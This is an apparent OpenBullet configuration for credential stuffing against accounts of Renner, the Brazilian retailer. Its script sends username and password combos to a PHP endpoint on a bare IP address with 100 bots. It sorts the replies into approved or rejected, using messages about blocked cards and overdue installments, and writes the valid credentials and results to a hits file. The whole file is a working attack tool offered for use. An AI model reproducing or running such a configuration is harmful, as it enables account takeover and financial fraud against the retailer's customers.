[SETTINGS]
{
  "Name": "RENNER SENHA DE 6 (26-02-2021) VERSAO NOVA",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-03-02T09:27:35.6765945-03:00",
  "AdditionalInfo": "",
  "Author": "WP",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#PROCEDIMENTO_PASSO_1 REQUEST GET "http://52.170.119.169/renner/apii2kia.php?linha=<USER>|<PASS>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#ATUALIZA_TOKEN KEYCHECK 
  KEYCHAIN Success OR 
    KEY "#APROVADO " 
  KEYCHAIN Failure OR 
    KEY "#REPROVADO" 
    KEY "REPROVADO" 
    KEY "temporariamente bloqueado" 
    KEY "Seu cart\\u00e3o est\\u00e1 com um bloqueio" 
    KEY "Parece que voc\\u00ea tem parcelas atrasadas" 
  KEYCHAIN Retry OR 
    KEY "REPROVADO PROXY RUIM" 

#DECRIPT PARSE "<SOURCE>" LR "|;resultado; " ";finalresultado;\"}" -> VAR "RESUL" 

!#DECRIPT2 PARSE "<RESUL>" LR "|;resultado; " ";finalresultado;\"}" -> VAR "RESUL" 

#REST_API_2 UTILITY File "RENNER  (UPDATE 26-02-2021).txt" AppendLines "<USER>|<PASS>|<RESUL>" -> CAP "RES" 

